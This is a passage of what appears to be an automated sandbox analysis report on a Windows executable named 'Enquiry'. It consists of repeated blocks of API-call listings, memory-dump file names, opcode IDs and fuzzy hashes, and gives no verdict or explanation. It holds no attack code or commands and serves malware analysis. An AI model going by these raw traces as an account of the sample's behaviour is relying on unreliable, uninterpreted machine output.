                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                            APIs
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Msctls_Progress32
                            • API String ID: 3850602802-3636473452
                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                            • String ID:
                            • API String ID: 3985565216-0
                            • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                            • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                            • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                            • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                            APIs
                            • _malloc.LIBCMT ref: 0041F707
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • _free.LIBCMT ref: 0041F71A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AllocateHeap_free_malloc
                            • String ID: [B
                            • API String ID: 1020059152-632041663
                            • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                            • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                            • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                            • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                            • __calloc_crt.LIBCMT ref: 00413DB0
                            • __getptd.LIBCMT ref: 00413DBD
                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                            • _free.LIBCMT ref: 00413E07
                            • __dosmaperr.LIBCMT ref: 00413E12
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                            • String ID:
                            • API String ID: 155776804-0
                            • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                            • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                            APIs
                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                            • String ID:
                            • API String ID: 1957940570-0
                            • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                            • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                            • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                            • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                            • ExitThread.KERNEL32 ref: 00413D4E
                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                            • __freefls@4.LIBCMT ref: 00413D74
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                            • String ID:
                            • API String ID: 259663610-0
                            • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                            • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                            • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                            • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                            APIs
                            • GetClientRect.USER32(?,?), ref: 004302E6
                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                            • GetClientRect.USER32(?,?), ref: 00430364
                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                            • GetWindowRect.USER32(?,?), ref: 004303C3
                            • ScreenToClient.USER32(?,?), ref: 004303EC
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Rect$Client$Window$MetricsScreenSystem
                            • String ID:
                            • API String ID: 3220332590-0
                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _malloc_wcslen$_strcat_wcscpy
                            • String ID:
                            • API String ID: 1612042205-0
                            • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                            • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove_strncmp
                            • String ID: >$U$\
                            • API String ID: 2666721431-237099441
                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                            APIs
                            • GetKeyboardState.USER32(?), ref: 0044C570
                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$InputSend
                            • String ID:
                            • API String ID: 2221674350-0
                            • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                            • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                            • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                            • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _wcscpy$_wcscat
                            • String ID:
                            • API String ID: 2037614760-0
                            • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                            • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                            • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                            • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                            APIs
                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                            • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                            • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                            • VariantClear.OLEAUT32(?), ref: 00451CA1
                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Variant$Copy$AllocClearErrorLastString
                            • String ID:
                            • API String ID: 960795272-0
                            • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                            • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                            • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                            • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                            APIs
                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                            • EndPaint.USER32(?,?), ref: 00447D13
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                            • String ID:
                            • API String ID: 4189319755-0
                            • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                            • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                            • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                            • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                            APIs
                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow$InvalidateRect
                            • String ID:
                            • API String ID: 1976402638-0
                            • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                            • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                            • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                            • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                            APIs
                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                            APIs
                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
